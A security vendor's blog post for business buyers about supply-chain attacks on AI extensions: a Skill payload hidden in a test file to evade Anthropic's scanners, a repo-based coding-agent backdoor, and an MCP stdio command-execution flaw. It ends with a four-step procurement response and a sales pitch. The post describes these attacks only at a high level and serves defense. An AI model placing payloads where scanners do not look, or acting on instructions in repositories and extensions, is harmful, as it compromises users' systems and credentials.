Anthropic Skill Scanners Pass: AI Extension Supply Chain Risk

On May 7, VentureBeat's security desk reported that Anthropic's scanners for the Skills capability — the extension surface that lets a Claude deployment add packaged capabilities — passed every check on a sample under analysis, while the malicious payload sat in a test file the scanners did not treat as runtime code. Read in isolation, that is one product-security story for one vendor. Read against two other incidents from the previous week, it is something more important: the AI industry's extension surfaces have outpaced the threat models that defenders apply to them, and the buyers of agentic AI products need to stop treating “the vendor scans for that” as the answer.

The two adjacent incidents are not adjacent by accident. On May 5, VentureBeat reported a one-command attack pattern that turned an arbitrary public repository into an AI-agent backdoor surface for an OpenClaw-class workflow. On May 1, VentureBeat covered an Ox Security audit that found a command-execution flaw in roughly 200,000 publicly-discoverable MCP servers running stdio-mode integrations. Three stories, three different layers of the AI extension stack — packaged Skills, repo-level coding-agent input, and model-context-protocol server transport — and one shared root cause: the trust boundary that the defender assumed existed was not the trust boundary the architecture actually enforced.

This post is for executives and buyers — anyone whose business has signed up for an agentic AI product in the last twelve months or is about to. The thesis is simple: the supply-chain layer of the AI stack has become a category-defining attack surface in 2026, and the procurement, governance, and architecture decisions that close the gap need to happen this quarter, not after the next quarterly board meeting.

Key Takeaways

Anthropic's Skill scanners passed a sample where the malicious payload was placed in a test file rather than the runtime code path — the scanners checked the surface they were designed to check, and the attack chose a different surface.
Three contemporaneous incidents — Skill scanners (May 7), a one-command repo backdoor pattern (May 5), and a 200,000-server MCP-stdio command-execution flaw (May 1) — share a single root cause: AI extension surfaces grew faster than the threat models defenders apply.
OWASP's 2025 LLM Top 10 names Supply Chain (LLM03) as a top-tier risk for LLM applications, alongside Prompt Injection (LLM01) and Excessive Agency (LLM06) — the catalog already exists; the procurement habits do not yet match it.
“The vendor scans for that” is no longer a sufficient procurement answer. Scanners are necessary but not sufficient; the procurement question is what runs when the scanner is wrong.
The four-step buyer response — extension inventory, scanner-coverage disclosure, runtime credential isolation, and an approval gate on capability install — is the practical version of what NIST AI RMF GOVERN-MAP-MEASURE-MANAGE looks like for a real business this quarter.

What Actually Happened with the Anthropic Skill Scanners?

Anthropic Skills are the capability-extension mechanism that lets a Claude deployment install packaged behaviors — a domain-specific tool, a workflow integration, a specialized prompt-and-tool bundle — without the operator having to assemble the pieces by hand. They are how every business buying into the Claude ecosystem will add capability over the next 18 months, the same way add-ins extended Microsoft Office and how packages extended every modern programming-language ecosystem before that.

Anthropic, per VentureBeat's coverage, runs scanners against published Skills to catch malicious patterns before installation. The reported failure was that a sample's scanners passed cleanly because the malicious payload sat in a test file, not in the runtime code path the scanners examined. The test file was still part of the published artifact and could be reached at install time or runtime depending on how the host environment treated test directories — but the scanner's threat model said “scan the runtime code,” and the attack said “okay, then we will not put it in the runtime code.”

This is a textbook scanner-coverage gap, not a novel cryptographic break. It is also exactly the failure mode the entire history of software supply-chain security has documented in other ecosystems: the package-registry scanner that examines the main module but not the build script, the dependency scanner that analyzes the manifest but not the post-install hook, the container scanner that checks the application layer but not the base image's setup scripts. The pattern is older than the technology in question. It just landed in the AI extension space on May 7.

The procurement implication is what matters for buyers. “Does the vendor scan for malicious extensions” is no longer a yes/no question. The actual question is what does the scanner cover, and what is the buyer's exposure if the attack chooses the surface the scanner does not cover. That is a different procurement conversation, and one most agentic-AI buyers have not yet had with their vendors.

Conceptual triptych illustration of three glowing extension-surface icons — a packaged module, a code repository, and a network protocol node — connected on a dark grid, representing the May 2026 AI extension supply-chain incident cluster.

How Do These Three Incidents Fit Together as One Threat Class?

The three reports — Skills, repo-level backdoor, MCP-stdio exposure — read like three separate news cycles. They are actually three views of one underlying class of failure. The class is “the AI extension surface is bigger than the defender's threat model assumed, and the attack moved to the part the defender did not check.”

Incident	Date	Extension Surface	Defender Assumption That Failed
Anthropic Skill scanner test-file bypass	2026-05-07	Packaged capability extensions for Claude	Scanner covers the runtime code path; test files are out of scope
One-command repo backdoor for OpenClaw-class workflows	2026-05-05	Coding-agent input from an arbitrary public repository	Cloning a public repo is a read-only operation that does not grant the repo authority over the agent
200K MCP-stdio servers with command-execution exposure	2026-05-01	Model Context Protocol server transport	Stdio-mode integration is local and bounded; published server endpoints are not part of the agent's network attack surface

In all three cases, the defender's threat model treated some part of the extension surface as inert. In all three cases, the attack chose specifically that part. This is the structural shape of every supply-chain attack pattern documented in the MITRE ATT&CK knowledge base Resource Development tactic — Compromise Software Dependencies and Development Tools, Compromise Software Supply Chain — applied to a new extension surface that the defender's existing threat model did not cover.

The root cause is the velocity of AI extension surfaces relative to the velocity of defender threat-modeling work. Anthropic Skills, MCP servers, OpenClaw-class agentic harnesses, IDE-embedded coding agents, browser-extension AI agents, model-host plugin systems — every one of these is a meaningful new surface, every one is shipping at six-week or faster cadence, and the threat models the buying side relies on are mostly inherited from a pre-agentic-AI era. The scanners that vendors build are working as designed; the design is one or two iterations behind the attack surface.

We covered the parallel pattern on the defender side in the AI security tools hijacked analysis — when adversaries hijacked AI security tools at 90+ organizations, the same root cause showed up: the defender's tooling itself was part of the unmodeled attack surface. The cluster is bigger than any single product. It is the category.

Open security framework reference book on a dark wooden desk with a translucent highlighter resting across a blurred numbered-section page, representing the OWASP LLM Top 10 risk catalog for AI procurement.

Where Does This Sit in the OWASP LLM Top 10 Framework?

OWASP's 2025 LLM Top 10 is the closest thing the industry has to a shared catalog of LLM application risks. The three risks most relevant to the May incidents are:

LLM01: Prompt Injection — the underlying technique in many extension-surface attacks; an extension that reads attacker-controlled text and acts on it.
LLM03: Supply Chain — the explicit category for vulnerabilities introduced through the LLM application's supply chain, including model packaging, plugin/extension distribution, and dependency provenance.
LLM06: Excessive Agency — the architectural condition that makes a successful supply-chain or prompt-injection attack consequential; an agent given more authority than its decision-making warrants amplifies any compromise.

The full catalog is published at OWASP's LLM Top 10 site. The Skill-scanner story sits in LLM03 (a flaw in the extension supply chain), the OpenClaw repo-backdoor story sits across LLM01 and LLM03 (a supply-chain delivered prompt-injection-class payload), and the MCP-stdio story sits in LLM06 amplifying LLM03 (an excessive-agency runtime exposed via a supply-chain-distributed integration). The catalog already exists. The procurement habit of mapping a vendor product against the catalog before signing the contract does not yet exist for most buyers.

This is the part of the conversation that needs to land at the executive level, not just in the security team. Reading the OWASP catalog is a one-hour exercise. Mapping a vendor's product against it is a one-meeting exercise. Putting “produce a written mapping of your product against OWASP LLM Top 10 LLM01, LLM03, and LLM06 with named mitigations” into the next vendor renewal is a one-line addition to a procurement template. None of this is hard. It is just not the default.

Clean executive desk with a four-tab folder, a closed laptop and a fountain pen on a printed contract template, representing the four-step buyer response checklist for AI extension supply-chain risk.

What Does the Four-Step Buyer Response Look Like in Practice?

A practical buyer response, deployable this quarter regardless of which specific agentic AI products a business has installed, has four steps. The four-step structure maps cleanly onto the four functions of the NIST AI Risk Management Framework — GOVERN, MAP, MEASURE, MANAGE — translated into procurement and operational language.

Step One: Extension Inventory (NIST MAP)

List every AI extension surface the business has installed across every agentic AI product in use. Skills, plugins, MCP servers, custom-tool integrations, IDE-embedded coding agents, browser extensions, automation connectors. Most businesses have never produced this inventory and discover surprising entries when they do. Our shadow AI data risk analysis covers the broader pattern of how extensions install without IT visibility — the AI-extension version of shadow IT is one of the fastest-growing categories of unmanaged organizational risk in 2026.

Step Two: Scanner-Coverage Disclosure (NIST GOVERN)

For every vendor on the inventory, ask in writing what the vendor's scanner-coverage policy is. What does the scanner check, what does it not check, and what is the buyer's contractual recourse if a scanner-passed extension turns out to contain a payload the scanner did not detect? Most vendors will not have a documented answer on first ask. The act of asking is itself the procurement-discipline shift.

Step Three: Runtime Credential Isolation (NIST MANAGE)

No AI extension should run with a credential that exceeds the extension's stated scope. The architectural pattern is the same one we covered in the zero-trust AI agents and credential isolation post — every extension's authority is brokered through a gateway that scopes per request, logs per tool call, and can revoke in seconds. The Cloud Radix Secure AI Gateway is built around exactly this assumption, and the assumption is structurally correct regardless of which product the buyer ends up with: the architecture has to assume the scanner will eventually be wrong.

Step Four: Approval Gate on Capability Install (NIST MEASURE)

Capability installation should be an event the operator can see, audit, and approve, not an autonomous workflow that runs in the background. The same approval-dialog pattern that scopes cross-application AI agent actions extends naturally to the extension-install layer. A business that does not know what extensions its agents are installing this week cannot have a meaningful incident response when one of those extensions turns out to be the May 7 story's protagonist.

The Mend AI security governance framework analysis covers the parallel governance pattern from the application-security tooling side; the buyer-side response above is the procurement and operational counterpart.

Empty developer workstation at dusk with a triple-monitor setup showing blurred terminal panes and an isolated USB-style hardware key resting on a closed notebook, representing AI coding agent extension and credential isolation.

How Does This Connect to the AI Coding Agent Risk Picture?

The AI coding agent class is where the extension-surface threat model and the operational-blast-radius question collide most directly. We walked through the dev-team and vendor-chain implications in the AI coding agents prompt injection and secret leaks post — the short version is that an AI coding agent with shell access and a packaged-extension dependency tree carries the worst of both the supply-chain story and the excessive-agency story at the same time.

The Skill-scanner story compounds the AI coding agent picture in a specific way: many of the extensions that a coding agent uses are themselves Skills-class packaged capabilities, distributed through extension registries that may or may not run scanners with adequate coverage. A coding agent that runs an extension that the vendor's scanner cleared but that contains a test-file payload is the multi-product version of the May 7 incident. The incident reach is not bounded to one product because the extension model is not bounded to one product.

The stage-three AI agent threats defense playbook covers the post-deployment monitoring layer that catches the cases the install-time scanner missed. The two layers are complementary — install-time scanning, runtime monitoring — and neither is sufficient on its own. The buyer's job is to require both from any agentic AI product that runs against business-critical data.

What Should a Fort Wayne Business Take From This?

Cloud Radix is based in Auburn, serves Fort Wayne and the wider Northeast Indiana market, and our security and architecture practice is structured around the assumption this post is making — scanners are insufficient, the extension surface is the new attack surface, and the buyer's procurement habits need to catch up. If your business has installed agentic AI products in the last twelve months and has not produced an extension inventory, run a scanner-coverage conversation with the vendor, or wired credential isolation through a Secure AI Gateway, the May incidents are the news hook that justifies that work this quarter. Reach out for a 30-minute architecture and procurement review and we will walk through the four-step buyer response against your specific product footprint.

Frequently Asked Questions

Q1.What are Anthropic Skills?

Anthropic Skills are the capability-extension mechanism for Claude deployments — a way to package a domain-specific tool, workflow integration, or prompt-and-tool bundle that a Claude installation can consume as a unit. Skills are how Claude-deployment buyers are expected to add and customize capability over time, similar in pattern to plugins or add-ins in other software ecosystems.

Q2.What does it mean that the scanner passed but the malicious code was in the test file?

It means the scanner examined the surface it was designed to examine — the runtime code path — and the attack placed its payload in a different surface (a test file in the same package) that the scanner's threat model did not cover. The scanner was not bypassed in a clever cryptographic sense; it was bypassed by choosing a part of the package the scanner did not check.

Q3.What is OWASP LLM03 and why does it matter here?

LLM03 in the OWASP 2025 Top 10 for LLM Applications is the Supply Chain risk category — vulnerabilities introduced through the LLM application's supply chain, including model packaging, plugin and extension distribution, and dependency provenance. The Skill-scanner story is a textbook LLM03 incident, and the OWASP catalog already provides the procurement language buyers need to require vendor mitigations.

Q4.Should we stop using Anthropic Skills, MCP servers, or agentic coding tools because of these incidents?

No. The pattern these incidents reveal is structural to the AI extension surface, not specific to any one vendor or product. Stopping use of these tools would forgo their operational value while not addressing the underlying procurement-discipline gap. The right response is the four-step buyer pattern — extension inventory, scanner-coverage disclosure, runtime credential isolation, and approval gating on capability install — applied across every agentic AI product in use.

Q5.What is a Secure AI Gateway and why does it help?

A Secure AI Gateway is an architectural layer that brokers an AI agent's access to credentials, tools, and external systems. Every agent action is scoped per request, logged per tool call, and revocable in seconds. Against the Skill-scanner-class story, the gateway is the architectural assumption that the scanner will eventually be wrong — even if a malicious extension reaches install or runtime, its blast radius is bounded by what the gateway lets it touch.

Q6.How fast is this threat class evolving?

The three incidents discussed here landed within seven days of each other across three different layers of the AI extension stack. The cadence is high enough that a quarterly procurement-review cycle is the right rhythm — anything slower means the procurement posture is at least a quarter behind the attack-surface evolution. NIST AI RMF GOVERN-MAP-MEASURE-MANAGE provides the policy scaffold; OWASP LLM Top 10 provides the risk catalog; the buyer's quarterly review is what translates both into actual posture.

Q7.Does this threat class matter for Fort Wayne and Northeast Indiana businesses, or only for enterprise buyers?

It matters at any scale where an agentic AI product is installed. The extension surface is determined by the product, not the buyer's revenue line. A 30-person Fort Wayne professional-services firm running an AI Employee with installed Skills, MCP servers, or coding-agent extensions has the same structural exposure as an enterprise buyer running the same products — and typically less in-house security capacity to triage an incident. The four-step buyer response is the same; the implementation effort is smaller because the extension footprint is smaller.

Sources & Further Reading

VentureBeat: venturebeat.com/security/anthropic-skill-scanners-passed-every-check-malicious-code-test-file — Anthropic Skill Scanners Passed Every Check — The Malicious Code Was in the Test File
VentureBeat: venturebeat.com/security/one-command-open-source-repo-ai-agent-backdoor-openclaw-supply-chain-scanner — One-Command Open-Source Repo AI Agent Backdoor: OpenClaw Supply-Chain Scanner
VentureBeat: venturebeat.com/security/mcp-stdio-flaw-200000-ai-agent-servers-exposed-ox-security-audit — MCP-Stdio Flaw: 200,000 AI Agent Servers Exposed (Ox Security Audit)
OWASP: genai.owasp.org/llm-top-10 — OWASP Top 10 for LLM Applications (2025)
NIST: nist.gov/itl/ai-risk-management-framework — NIST AI Risk Management Framework
MITRE: attack.mitre.org — MITRE ATT&CK Knowledge Base

Audit Your AI Extension Surface This Quarter

The scanner passing is not the same as the extension being safe. Cloud Radix will run the four-step buyer response against your installed agentic AI products and wire credential isolation through a Secure AI Gateway where it matters.

Book a 30-Minute Review Explore Secure AI Gateway

Key Takeaways

Anthropic's Skill scanners passed a sample where the malicious payload was placed in a test file rather than the runtime code path — the scanners checked the surface they were designed to check, and the attack chose a different surface.
Three contemporaneous incidents — Skill scanners (May 7), a one-command repo backdoor pattern (May 5), and a 200,000-server MCP-stdio command-execution flaw (May 1) — share a single root cause: AI extension surfaces grew faster than the threat models defenders apply.
OWASP's 2025 LLM Top 10 names Supply Chain (LLM03) as a top-tier risk for LLM applications, alongside Prompt Injection (LLM01) and Excessive Agency (LLM06) — the catalog already exists; the procurement habits do not yet match it.
“The vendor scans for that” is no longer a sufficient procurement answer. Scanners are necessary but not sufficient; the procurement question is what runs when the scanner is wrong.
The four-step buyer response — extension inventory, scanner-coverage disclosure, runtime credential isolation, and an approval gate on capability install — is the practical version of what NIST AI RMF GOVERN-MAP-MEASURE-MANAGE looks like for a real business this quarter.

What Actually Happened with the Anthropic Skill Scanners?

How Do These Three Incidents Fit Together as One Threat Class?

Incident	Date	Extension Surface	Defender Assumption That Failed
Anthropic Skill scanner test-file bypass	2026-05-07	Packaged capability extensions for Claude	Scanner covers the runtime code path; test files are out of scope
One-command repo backdoor for OpenClaw-class workflows	2026-05-05	Coding-agent input from an arbitrary public repository	Cloning a public repo is a read-only operation that does not grant the repo authority over the agent
200K MCP-stdio servers with command-execution exposure	2026-05-01	Model Context Protocol server transport	Stdio-mode integration is local and bounded; published server endpoints are not part of the agent's network attack surface

Where Does This Sit in the OWASP LLM Top 10 Framework?

OWASP's 2025 LLM Top 10 is the closest thing the industry has to a shared catalog of LLM application risks. The three risks most relevant to the May incidents are:

LLM01: Prompt Injection — the underlying technique in many extension-surface attacks; an extension that reads attacker-controlled text and acts on it.
LLM03: Supply Chain — the explicit category for vulnerabilities introduced through the LLM application's supply chain, including model packaging, plugin/extension distribution, and dependency provenance.
LLM06: Excessive Agency — the architectural condition that makes a successful supply-chain or prompt-injection attack consequential; an agent given more authority than its decision-making warrants amplifies any compromise.

What Does the Four-Step Buyer Response Look Like in Practice?

Step One: Extension Inventory (NIST MAP)

Step Two: Scanner-Coverage Disclosure (NIST GOVERN)

Step Three: Runtime Credential Isolation (NIST MANAGE)

Step Four: Approval Gate on Capability Install (NIST MEASURE)

How Does This Connect to the AI Coding Agent Risk Picture?

What Should a Fort Wayne Business Take From This?

Frequently Asked Questions

Q1.What are Anthropic Skills?

Q2.What does it mean that the scanner passed but the malicious code was in the test file?

Q3.What is OWASP LLM03 and why does it matter here?

Q4.Should we stop using Anthropic Skills, MCP servers, or agentic coding tools because of these incidents?

Q5.What is a Secure AI Gateway and why does it help?

Q6.How fast is this threat class evolving?

Q7.Does this threat class matter for Fort Wayne and Northeast Indiana businesses, or only for enterprise buyers?

Sources & Further Reading

VentureBeat: venturebeat.com/security/anthropic-skill-scanners-passed-every-check-malicious-code-test-file — Anthropic Skill Scanners Passed Every Check — The Malicious Code Was in the Test File
VentureBeat: venturebeat.com/security/one-command-open-source-repo-ai-agent-backdoor-openclaw-supply-chain-scanner — One-Command Open-Source Repo AI Agent Backdoor: OpenClaw Supply-Chain Scanner
VentureBeat: venturebeat.com/security/mcp-stdio-flaw-200000-ai-agent-servers-exposed-ox-security-audit — MCP-Stdio Flaw: 200,000 AI Agent Servers Exposed (Ox Security Audit)
OWASP: genai.owasp.org/llm-top-10 — OWASP Top 10 for LLM Applications (2025)
NIST: nist.gov/itl/ai-risk-management-framework — NIST AI Risk Management Framework
MITRE: attack.mitre.org — MITRE ATT&CK Knowledge Base

Audit Your AI Extension Surface This Quarter

Book a 30-Minute Review Explore Secure AI Gateway

Anthropic Skill Scanners Pass: AI Extension Supply Chain Risk

What Actually Happened with the Anthropic Skill Scanners?

How Do These Three Incidents Fit Together as One Threat Class?

Where Does This Sit in the OWASP LLM Top 10 Framework?

What Does the Four-Step Buyer Response Look Like in Practice?

Step One: Extension Inventory (NIST MAP)

Step Two: Scanner-Coverage Disclosure (NIST GOVERN)

Step Three: Runtime Credential Isolation (NIST MANAGE)

Step Four: Approval Gate on Capability Install (NIST MEASURE)

How Does This Connect to the AI Coding Agent Risk Picture?

What Should a Fort Wayne Business Take From This?

Frequently Asked Questions

Q1.What are Anthropic Skills?

Q2.What does it mean that the scanner passed but the malicious code was in the test file?

Q3.What is OWASP LLM03 and why does it matter here?

Q4.Should we stop using Anthropic Skills, MCP servers, or agentic coding tools because of these incidents?

Q5.What is a Secure AI Gateway and why does it help?

Q6.How fast is this threat class evolving?

Q7.Does this threat class matter for Fort Wayne and Northeast Indiana businesses, or only for enterprise buyers?

Sources & Further Reading

Audit Your AI Extension Surface This Quarter

Related Articles

AI Defender Compromise: When Security Tools Become Attackers 2026

AI Coding Agents Leaked Secrets: Fort Wayne Vendor Audit 2026

Shadow AI Is Your Biggest Data Risk in 2026

Ready to See What This Costs?

Anthropic Skill Scanners Pass: AI Extension Supply Chain Risk

What Actually Happened with the Anthropic Skill Scanners?

How Do These Three Incidents Fit Together as One Threat Class?

Where Does This Sit in the OWASP LLM Top 10 Framework?

What Does the Four-Step Buyer Response Look Like in Practice?

Step One: Extension Inventory (NIST MAP)

Step Two: Scanner-Coverage Disclosure (NIST GOVERN)

Step Three: Runtime Credential Isolation (NIST MANAGE)

Step Four: Approval Gate on Capability Install (NIST MEASURE)

How Does This Connect to the AI Coding Agent Risk Picture?

What Should a Fort Wayne Business Take From This?

Frequently Asked Questions

Q1.What are Anthropic Skills?

Q2.What does it mean that the scanner passed but the malicious code was in the test file?

Q3.What is OWASP LLM03 and why does it matter here?

Q4.Should we stop using Anthropic Skills, MCP servers, or agentic coding tools because of these incidents?

Q5.What is a Secure AI Gateway and why does it help?

Q6.How fast is this threat class evolving?

Q7.Does this threat class matter for Fort Wayne and Northeast Indiana businesses, or only for enterprise buyers?

Sources & Further Reading

Audit Your AI Extension Surface This Quarter

Related Articles

AI Defender Compromise: When Security Tools Become Attackers 2026

AI Coding Agents Leaked Secrets: Fort Wayne Vendor Audit 2026

Shadow AI Is Your Biggest Data Risk in 2026

Ready to See What This Costs?